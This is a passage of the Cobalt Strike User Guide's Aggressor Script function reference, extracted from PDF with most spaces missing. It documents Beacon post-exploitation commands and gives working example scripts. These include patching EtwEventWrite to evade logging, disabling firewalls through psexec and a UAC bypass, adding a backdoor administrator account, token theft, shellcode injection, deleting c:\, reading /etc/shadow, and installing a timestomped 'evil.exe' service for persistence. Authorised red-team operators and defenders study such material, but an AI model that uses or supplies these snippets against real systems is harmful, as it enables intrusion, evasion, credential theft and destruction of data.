4"patch-rule"rulescanbespecified(spacedelimited).
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-
|
||
patch-value]
|
||
library -1-260characters
|
||
function -1-256characters
|
||
offset -0-65535(Theoffsetfromthestartoftheexecutablefunction)
|
||
hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex
|
||
pairs).
|
||
Example
|
||
# get the version of PowerShell available via Unmanaged PowerShell
|
||
alias powerver {
|
||
bpowerpick($1, '$PSVersionTable.PSVersion');
|
||
}
|
||
alias powerver2 {
|
||
bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES:
|
||
ntdll.dll,EtwEventWrite,0,C300');
|
||
}
|
||
bpowershell
|
||
AskBeacontorunaPowerShellcmdlet
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
CobaltStrikeUserGuide www.fortra.com page:319
|
||
|
||
AggressorScript/Functions
|
||
$2-thecmdletandarguments
|
||
$3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas
|
||
thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload
|
||
cradle.Specify$nulltousethecurrentimportedPowerShellscript.
|
||
$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Example
|
||
# get the version of PowerShell...
|
||
alias powerver {
|
||
bpowershell($1, '$PSVersionTable.PSVersion');
|
||
}
|
||
bpowershell_import
|
||
ImportaPowerShellscriptintoaBeacon
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thepathtothelocalfiletoimport
|
||
Example
|
||
# quickly run PowerUp
|
||
alias powerup {
|
||
bpowershell_import($1, script_resource("PowerUp.ps1"));
|
||
bpowershell($1, "Invoke-AllChecks");
|
||
}
|
||
bpowershell_import_clear
|
||
CleartheimportedPowerShellscriptfromaBeaconsession.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
CobaltStrikeUserGuide www.fortra.com page:320
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
alias powershell-clear {
|
||
bpowershell_import_clear($1);
|
||
}
|
||
bppid
|
||
SetaparentprocessforBeacon'schildprocesses
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theparentprocessID.Specify0toresettodefaultbehavior.
|
||
Notes
|
||
l Thecurrentsessionmusthaverightstoaccessthespecifiedparentprocess.
|
||
l Attemptstospawnpost-exjobsunderparentprocessesinanotherdesktopsession
|
||
mayfail.ThislimitationisduetohowBeaconlaunchesits"temporary"processesfor
|
||
post-exploitationjobsandinjectscodeintothem.
|
||
Example
|
||
alias prepenv {
|
||
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
|
||
bps($1, {
|
||
local('$pid $name $entry');
|
||
foreach $entry (split("\n", $2)) {
|
||
($name, $null, $pid) = split("\\s+", $entry);
|
||
if ($name eq "explorer.exe") {
|
||
bppid($1, $pid);
|
||
}
|
||
}
|
||
});
|
||
}
|
||
bprintscreen
|
||
AskBeacontotakeascreenshotviaPrintScrmethod.
|
||
CobaltStrikeUserGuide www.fortra.com page:321
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-(optional)thePIDtoinjectthescreenshottoolviaPrintScrmethodor$null.
|
||
$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null.
|
||
Example
|
||
Spawnatemporaryprocess
|
||
item "&Printscreen" {
|
||
binput($1, "printscreen");
|
||
bpintscreen($1);
|
||
}
|
||
Injectintothespecifiedprocess
|
||
bprintscreen($1, 1234, "x64");
|
||
bps
|
||
TaskaBeacontolistprocesses
|
||
Variations
|
||
bps($1);
|
||
OutputtheresultstotheBeaconconsole.
|
||
bps($1, &callback);
|
||
Routeresultstothespecifiedcallbackfunction.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
CobaltStrikeUserGuide www.fortra.com page:322
|
||
|
||
AggressorScript/Functions
|
||
$2-(optional)callbackfunctionwiththepsresults.Argumentstothecallbackare:$1=beacon
|
||
ID,$2=results
|
||
Example
|
||
on beacon_initial {
|
||
bps($1);
|
||
}
|
||
alias prepenv {
|
||
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
|
||
bps($1, {
|
||
local('$pid $name $entry');
|
||
foreach $entry (split("\n", $2)) {
|
||
($name, $null, $pid) = split("\\s+", $entry);
|
||
if ($name eq "explorer.exe") {
|
||
bppid($1, $pid);
|
||
}
|
||
}
|
||
});
|
||
}
|
||
bpsexec
|
||
AskBeacontospawnapayloadonaremotehost.ThisfunctiongeneratesanArtifactKit
|
||
executable,copiesittothetarget,andcreatesaservicetorunitandcleanitup.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargettospawnapayloadonto
|
||
$3-thelistenertospawn
|
||
$4-thesharetocopytheexecutableto
|
||
$5-thearchitectureofthepayloadtogenerate/deliver(x86orx64)
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:323
|
||
|
||
AggressorScript/Functions
|
||
brev2self();
|
||
bloginuser($1, "CORP", "Administrator", "toor");
|
||
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");
|
||
bpsexec_command
|
||
AskBeacontorunacommandonaremotehost.Thisfunctioncreatesaserviceontheremote
|
||
host,startsit,andcleansitup.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargettorunthecommandon
|
||
$3-thenameoftheservicetocreate
|
||
$4-thecommandtorun.
|
||
Example
|
||
# disable the firewall on a remote target
|
||
# beacon> shieldsdown [target]
|
||
alias shieldsdown {
|
||
bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set
|
||
allprofiles state off");
|
||
}
|
||
bpsexec_psh
|
||
REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.
|
||
bpsinject
|
||
InjectUnmanagedPowerShellintoaspecificprocessandrunthespecifiedcmdlet.Thiswilluse
|
||
thecurrentimportedpowershellscript.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theprocesstoinjectthesessioninto
|
||
CobaltStrikeUserGuide www.fortra.com page:324
|
||
|
||
AggressorScript/Functions
|
||
$3-theprocessarchitecture(x86|x64)
|
||
$4-thecmdlettorun
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Example
|
||
bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");
|
||
bpwd
|
||
AskBeacontoprintitscurrentworkingdirectory
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
alias pwd {
|
||
bpwd($1);
|
||
}
|
||
breg_query
|
||
AskBeacontoqueryakeywithintheregistry.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thepathtothekey
|
||
$3-x86|x64-whichviewoftheregistrytouse
|
||
Example
|
||
alias typedurls {
|
||
breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs",
|
||
CobaltStrikeUserGuide www.fortra.com page:325
|
||
|
||
AggressorScript/Functions
|
||
"x86");
|
||
}
|
||
breg_queryv
|
||
AskBeacontoqueryavaluewithinaregistrykey.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thepathtothekey
|
||
$3-thenameofthevaluetoquery
|
||
$4-x86|x64-whichviewoftheregistrytouse
|
||
Example
|
||
alias winver {
|
||
breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion",
|
||
"ProductName", "x86");
|
||
}
|
||
bremote_exec
|
||
AskBeacontorunacommandonaremotetarget.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theremoteexecutemethodtouse
|
||
$3-theremotetarget
|
||
$4-thecommandandargumentstorun
|
||
Example
|
||
# winrm [target] [command+args]
|
||
alias winrm-exec {
|
||
CobaltStrikeUserGuide www.fortra.com page:326
|
||
|
||
AggressorScript/Functions
|
||
bremote_exec($1, "winrm", $2, $3); {
|
||
}
|
||
Seealso
|
||
&beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&beacon_
|
||
remote_exec_methods
|
||
brev2self
|
||
AskBeacontodropitscurrenttoken.ThiscallstheRevertToSelf()Win32API.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
alias rev2self {
|
||
brev2self($1);
|
||
}
|
||
brm
|
||
AskBeacontoremoveafileorfolder.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefileorfoldertoremove
|
||
Example
|
||
# nuke the system
|
||
brm($1, "c:\\");
|
||
brportfwd
|
||
AskBeacontosetupareverseportforward.
|
||
CobaltStrikeUserGuide www.fortra.com page:327
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theporttobindtoonthetarget
|
||
$3-thehosttoforwardconnectionsto
|
||
$4-theporttoforwardconnectionsto
|
||
Example
|
||
brportfwd($1, 80, "192.168.12.88", 80);
|
||
brportfwd_local
|
||
AskBeacontosetupareverseportforwardthatroutestothecurrentCobaltStrikeclient.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theporttobindtoonthetarget
|
||
$3-thehosttoforwardconnectionsto
|
||
$4-theporttoforwardconnectionsto
|
||
Example
|
||
brportfwd_local($1, 80, "192.168.12.88", 80);
|
||
brportfwd_stop
|
||
AskBeacontostopareverseportforward
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theportboundonthetarget
|
||
CobaltStrikeUserGuide www.fortra.com page:328
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
brportfwd_stop($1, 80);
|
||
brun
|
||
AskBeacontorunacommand
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandandargumentstorun
|
||
Note
|
||
Thiscapabilityisasimplerversionofthe&beacon_execute_jobfunction.Thelatterfunctionis
|
||
what&bpowershelland&bshellbuildon.Thisisa(slightly)moreOPSEC-safeoptiontorun
|
||
commandsandreceiveoutputfromthem.
|
||
Example
|
||
alias w {
|
||
brun($1, "whoami /all");
|
||
}
|
||
brunas
|
||
AskBeacontorunacommandasanotheruser.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thedomainoftheuser
|
||
$3-theuser'susername
|
||
$4-theuser'spassword
|
||
$5-thecommandtorun
|
||
CobaltStrikeUserGuide www.fortra.com page:329
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
brunas($1, "CORP", "Administrator", "toor", "notepad.exe");
|
||
brunasadmin
|
||
REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with psexec_psh
|
||
option.
|
||
AskBeacontorunacommandinahigh-integritycontext(bypassesUAC).
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandanditsarguments.
|
||
Notes
|
||
ThiscommandusestheTokenDuplicationUACbypass.Thisbypasshasafewrequirements:
|
||
l Yourusermustbealocaladmin
|
||
l IfAlways Notifyisenabled,anexistinghighintegrityprocessmustberunninginthe
|
||
currentdesktopsession.
|
||
Example
|
||
# disable the firewall
|
||
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");
|
||
brunu
|
||
AskBeacontorunaprocessunderanotherprocess.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDoftheparentprocess
|
||
$3-thecommand+argumentstorun
|
||
CobaltStrikeUserGuide www.fortra.com page:330
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
brunu($1, 1234, "notepad.exe");
|
||
bscreenshot
|
||
AskBeacontotakeascreenshot.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-(optional)thePIDtoinjectthescreenshottoolor$null
|
||
$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
Spawnatemporaryprocess
|
||
item "&Screenshot" {
|
||
binput($1, "screenshot");
|
||
bscreenshot($1);
|
||
}
|
||
Injectintothespecifiedprocess
|
||
bscreenshot($1, 1234, "x64");
|
||
bscreenwatch
|
||
AskBeacontotakeperiodicscreenshots
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-(optional)thePIDtoinjectthescreenshottoolor$null
|
||
CobaltStrikeUserGuide www.fortra.com page:331
|
||
|
||
AggressorScript/Functions
|
||
$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
Spawnatemporaryprocess
|
||
item "&Screenwatch" {
|
||
binput($1, "screenwatch");
|
||
bscreenwatch($1);
|
||
}
|
||
Injectintothespecifiedprocess
|
||
bscreenwatch($1, 1234, "x64");
|
||
bsetenv
|
||
AskBeacontosetanenvironmentvariable
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theenvironmentvariabletoset
|
||
$3-thevaluetosettheenvironmentvariableto(specify$nulltounsetthevariable)
|
||
Example
|
||
alias tryit {
|
||
bsetenv($1, "foo", "BAR!");
|
||
bshell($1, "echo %foo%");
|
||
}
|
||
bshell
|
||
AskBeacontorunacommandwithcmd.exe
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:332
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandandargumentstorun
|
||
Example
|
||
alias adduser {
|
||
bshell($1, "net user $2 B00gyW00gy1234! /ADD");
|
||
bshell($1, "net localgroup \"Administrators\" $2 /ADD");
|
||
}
|
||
bshinject
|
||
Injectshellcode(fromalocalfile)intoaspecificprocess
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDoftheprocesstoinjectinto
|
||
$3-theprocessarchitecture(x86|x64)
|
||
$4-thelocalfilewiththeshellcode
|
||
Example
|
||
bshinject($1, 1234, "x86", "/path/to/stuff.bin");
|
||
bshspawn
|
||
Spawnshellcode(fromalocalfile)intoanotherprocess.ThisfunctionbenefitsfromBeacon's
|
||
configurationtospawnpost-exploitationjobs(e.g.,spawnto,ppid,etc.)
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theprocessarchitecture(x86|x64)
|
||
$3-thelocalfilewiththeshellcode
|
||
CobaltStrikeUserGuide www.fortra.com page:333
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
bshspawn($1, "x86", "/path/to/stuff.bin");
|
||
bsleep
|
||
AskBeacontochangeitsbeaconingintervalandjitterfactor.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thenumberofsecondsbetweenbeacons.
|
||
$3-thejitterfactor[0-99]
|
||
Example
|
||
alias stealthy {
|
||
# sleep for 1 hour with 30% jitter factor
|
||
bsleep($1, 60 * 60, 30);
|
||
}
|
||
bsleepu
|
||
AskBeacontochangeitsbeaconingintervalandjitterfactor.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-beaconsleepperiodstring.
|
||
Thebeaconsleepperiodstringtakestheformat:ud vh xm ys zj
|
||
Were:
|
||
wisthenumberofdays
|
||
visthenumberofhours
|
||
xisthenumberofminutes
|
||
CobaltStrikeUserGuide www.fortra.com page:334
|
||
|
||
AggressorScript/Functions
|
||
yisthenumberofseconds
|
||
zisthejitterfactor[0-99]
|
||
Example
|
||
alias stealthy {
|
||
# sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
|
||
bsleepu($1, "2d 13h 45m 8s 30j");
|
||
}
|
||
bsocks
|
||
StartaSOCKSproxyserverassociatedwithabeacon.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theporttobindto
|
||
$3-SOCKSversion[SOCKS4|SOCKS5]Default:SOCKS4
|
||
ForSOCKS5only:
|
||
$4-enable/disableNoAuthauthentication[enableNoAuth|disableNoAuth]Default:
|
||
enableNoAuth
|
||
$5-usernameforUser/Passwordauthentication[blank|username]Default:Blank
|
||
$6-passwordforUser/Passwordauthentication[blank|password]Default:Blank
|
||
$7-enablelogging[enableLogging|disableLogging]Default:disableLogging
|
||
Example
|
||
alias socksPorts {
|
||
bsocks($1, 10401);
|
||
bsocks($1, 10402, "SOCKS4");
|
||
bsocks($1, 10501, "SOCKS5");
|
||
bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "",
|
||
"disableLogging");
|
||
bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname",
|
||
CobaltStrikeUserGuide www.fortra.com page:335
|
||
|
||
AggressorScript/Functions
|
||
"mypassword", "disableLogging");
|
||
bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname",
|
||
"mypassword", "enableLogging");
|
||
}
|
||
bsocks_stop
|
||
StopSOCKSproxyserversassociatedwiththespecifiedBeacon.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
alias stopsocks {
|
||
bsocks_stop($1);
|
||
}
|
||
bspawn
|
||
AskBeacontospawnanewsession
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelistenertotarget.
|
||
$3-thearchitecturetospawnaprocessfor(defaultstocurrentbeaconarch)
|
||
Example
|
||
item "&Spawn" {
|
||
openPayloadHelper(lambda({
|
||
binput($bids, "spawn x86 $1");
|
||
bspawn($bids, $1, "x86");
|
||
}, $bids => $1));
|
||
}
|
||
bspawnas
|
||
CobaltStrikeUserGuide www.fortra.com page:336
|
||
|
||
AggressorScript/Functions
|
||
AskBeacontospawnasessionasanotheruser.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thedomainoftheuser
|
||
$3-theuser'susername
|
||
$4-theuser'spassword
|
||
$5-thelistenertospawn
|
||
Example
|
||
bspawnas($1, "CORP", "Administrator", "toor", "my listener");
|
||
bspawnto
|
||
ChangethedefaultprogramBeaconspawnstoinjectcapabilitiesinto.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thearchitecturewe'remodifyingthespawntosettingfor(x86,x64)
|
||
$3-theprogramtospawn
|
||
Notes
|
||
Thevalueyouspecifyforspawntomustworkfromx86->x86,x86->x64,x64->x86,andx64->x86
|
||
contexts.Thisistricky.Followtheserulesandyou'llbeOK:
|
||
1.AlwaysspecifythefullpathtotheprogramyouwantBeacontospawnforitspost-exjobs.
|
||
2.Environmentvariables(e.g.,%windir%)areOKwithinthesepaths.
|
||
3.Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse
|
||
syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32ifit's
|
||
necessary.
|
||
CobaltStrikeUserGuide www.fortra.com page:337
|
||
|
||
AggressorScript/Functions
|
||
4.Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue,you
|
||
mustspecifyanx64program.
|
||
Example
|
||
# let's make everything lame.
|
||
on beacon_initial {
|
||
binput($1, "prep session with new spawnto values.");
|
||
bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
|
||
bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
|
||
}
|
||
bspawnu
|
||
AskBeacontospawnasessionunderanotherprocess.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theprocesstospawnthissessionunder
|
||
$3-thelistenertospawn
|
||
Example
|
||
bspawnu($1, 1234, "my listener");
|
||
bspunnel
|
||
SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport
|
||
forward)
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thehostofthecontroller
|
||
$3-theportofthecontroller
|
||
$4-afilewithposition-independentcodetoexecuteinatemporaryprocess.
|
||
CobaltStrikeUserGuide www.fortra.com page:338
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));
|
||
bspunnel_local
|
||
SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport
|
||
forward).Note:thisreverseportforwardtunneltraversesthroughtheBeaconchaintotheteam
|
||
serverand,viatheteamserver,outthroughtherequestingCobaltStrikeclient.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thehostofthecontroller
|
||
$3-theportofthecontroller
|
||
$4-afilewithposition-independentcodetoexecuteinatemporaryprocess.
|
||
Example
|
||
bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));
|
||
bssh
|
||
AskBeacontospawnanSSHsession.
|
||
Arguments
|
||
$1-idforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-IPaddressorhostnameofthetarget
|
||
$3-port(e.g.,22)
|
||
$4-username
|
||
$5-password
|
||
$6-(optional)thePIDtoinjecttheSSHclientintoor$null
|
||
CobaltStrikeUserGuide www.fortra.com page:339
|
||
|
||
AggressorScript/Functions
|
||
$7-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
Spawnatemporaryprocess
|
||
bssh($1, "172.16.20.128", 22, "root", "toor");
|
||
Injectintothespecifiedprocess
|
||
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");
|
||
bssh_key
|
||
AskBeacontospawnanSSHsessionusingthedatafromakeyfile.Thekeyfileneedstobein
|
||
thePEMformat.IfthefileisnotinthePEMformatthenmakeacopyofthefileandconvertthe
|
||
copywiththefollowingcommand:
|
||
/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p
|
||
Arguments
|
||
$1-idforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-IPaddressorhostnameofthetarget
|
||
$3-port(e.g.,22)
|
||
$4-username
|
||
$5-keydata(asastring)
|
||
$6-(optional)thePIDtoinjecttheSSHclientintoor$null
|
||
$7-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Example
|
||
alias myssh {
|
||
$pid = $2;
|
||
$arch = $3;
|
||
CobaltStrikeUserGuide www.fortra.com page:340
|
||
|
||
AggressorScript/Functions
|
||
$handle = openf("/path/to/key.pem");
|
||
$keydata = readb($handle, -1);
|
||
closef($handle);
|
||
if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
|
||
bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
|
||
} else {
|
||
bssh_key($1, "172.16.20.128", 22, "root", $keydata);
|
||
}
|
||
};
|
||
bstage
|
||
REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or
|
||
&beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.
|
||
bsteal_token
|
||
AskBeacontostealatokenfromaprocess.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDtotakethetokenfrom
|
||
Use: bsteal_token [pid]
|
||
bsteal_token [pid] <OpenProcessToken access mask>
|
||
OpenProcessToken access mask suggested values:
|
||
blank = default (TOKEN_ALL_ACCESS)
|
||
0 = TOKEN_ALL_ACCESS
|
||
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)
|
||
Access mask values:
|
||
STANDARD_RIGHTS_REQUIRED . . . . : 983040
|
||
TOKEN_ASSIGN_PRIMARY . . . . . . : 1
|
||
TOKEN_DUPLICATE . . . . . . . . : 2
|
||
TOKEN_IMPERSONATE . . . . . . . : 4
|
||
TOKEN_QUERY . . . . . . . . . . : 8
|
||
TOKEN_QUERY_SOURCE . . . . . . . : 16
|
||
TOKEN_ADJUST_PRIVILEGES . . . . : 32
|
||
TOKEN_ADJUST_GROUPS . . . . . . : 64
|
||
TOKEN_ADJUST_DEFAULT . . . . . . : 128
|
||
TOKEN_ADJUST_SESSIONID . . . . . : 256
|
||
CobaltStrikeUserGuide www.fortra.com page:341
|
||
|
||
AggressorScript/Functions
|
||
NOTE:
|
||
'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing
|
||
'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5)
|
||
Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global
|
||
options.
|
||
Example
|
||
alias steal_token {
|
||
bsteal_token($1, int($2));
|
||
}
|
||
bsudo
|
||
AskBeacontorunacommandviasudo(SSHsessionsonly)
|
||
Arguments
|
||
$1-theidforthesession.ThismaybeanarrayorasingleID.
|
||
$2-thepasswordforthecurrentuser
|
||
$3-thecommandandargumentstorun
|
||
Example
|
||
# hashdump [password]
|
||
ssh_alias hashdump {
|
||
bsudo($1, $2, "cat /etc/shadow");
|
||
}
|
||
bsyscall_method
|
||
AskBeacontochangeitssyscallmethod.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thesyscallmethod.Supportedmethodsare:
|
||
CobaltStrikeUserGuide www.fortra.com page:342
|
||
|
||
AggressorScript/Functions
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
|
||
NOTE:
|
||
Ifthe$2argumentisempty,Beaconistaskedtoquerythecurrentlyusedsyscallmethod.
|
||
Example
|
||
alias syscall_method {
|
||
bsyscall_method($1, $2);
|
||
}
|
||
btask
|
||
ReportataskacknowledgementforaBeacon.Thistaskacknowledgementwillalsocontribute
|
||
tothenarrativeinCobaltStrike'sActivityReportandSessionsReport.
|
||
Arguments
|
||
$1-theidforthebeacontopostto
|
||
$2-thetexttopost
|
||
$3-astringwithMITREATT&CKTacticIDs.UseacommaandaspacetospecifymultipleIDs
|
||
inonestring.
|
||
https://attack.mitre.org
|
||
Example
|
||
alias foo {
|
||
btask($1, "User tasked beacon to foo", "T1015");
|
||
}
|
||
btimestomp
|
||
AskBeacontochangethefilemodified/accessed/createdtimestomatchanotherfile.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:343
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefiletoupdatetimestampvaluesfor
|
||
$3-thefiletograbtimestampvaluesfrom
|
||
Example
|
||
alias persist {
|
||
bcd($1, "c:\\windows\\system32");
|
||
bupload($1, script_resource("evil.exe"));
|
||
btimestomp($1, "evil.exe", "cmd.exe");
|
||
bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
|
||
bshell($1, 'sc start evil');
|
||
}
|
||
btoken_store_remove
|
||
AskBeacontoremovespecificaccesstokensfromthestore.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thearrayoftokenIDstoremove.
|
||
Example
|
||
alias token-store_remove {
|
||
btoken_store_remove($1, @(int($2)));
|
||
}
|
||
btoken_store_remove_all
|
||
AskBeacontoremovealltokensfromthestore.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:344
|
||
|
||
AggressorScript/Functions
|
||
alias token-store_remove_all {
|
||
btoken_store_remove_all($1);
|
||
}
|
||
btoken_store_show
|
||
AskBeacontoprintthetokenscurrentlyavailableinthetokenstore.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
alias token-store_show {
|
||
btoken_store_show($1);
|
||
}
|
||
btoken_store_steal
|
||
AskBeacontostealatokenandstoreitinthetokenstore.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thearrayofPIDstotakethetokensfrom.
|
||
$3-theOpenProcessTokenaccessmask.
|
||
Example
|
||
alias token-store_steal {
|
||
btoken_store_steal($1, @(int($2)), 11);
|
||
}
|
||
btoken_store_steal_and_use
|
||
AskBeacontostealatoken,storeitandimmediatelyapplyittothebeacon.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:345
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDtotakethetokenfrom.
|
||
$3-theOpenProcessTokenaccessmask.
|
||
Example
|
||
alias token-store_steal_and_use {
|
||
btoken_store_steal_and_use($1, int($2), 11);
|
||
}
|
||
btoken_store_use
|
||
AskBeacontouseatokenfromthetokenstore.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetokenID.
|
||
Example
|
||
alias token-store_use {
|
||
btoken_store_use($1, int($2));
|
||
}
|
||
bunlink
|
||
AskBeacontodelinkaBeaconitsconnectedtooveraTCPsocketornamedpipe.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargethosttounlink(specifiedasanIPaddress)
|
||
$3-(optional)thePIDofthetargetsessiontounlink
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:346
|
||
|
||
AggressorScript/Functions
|
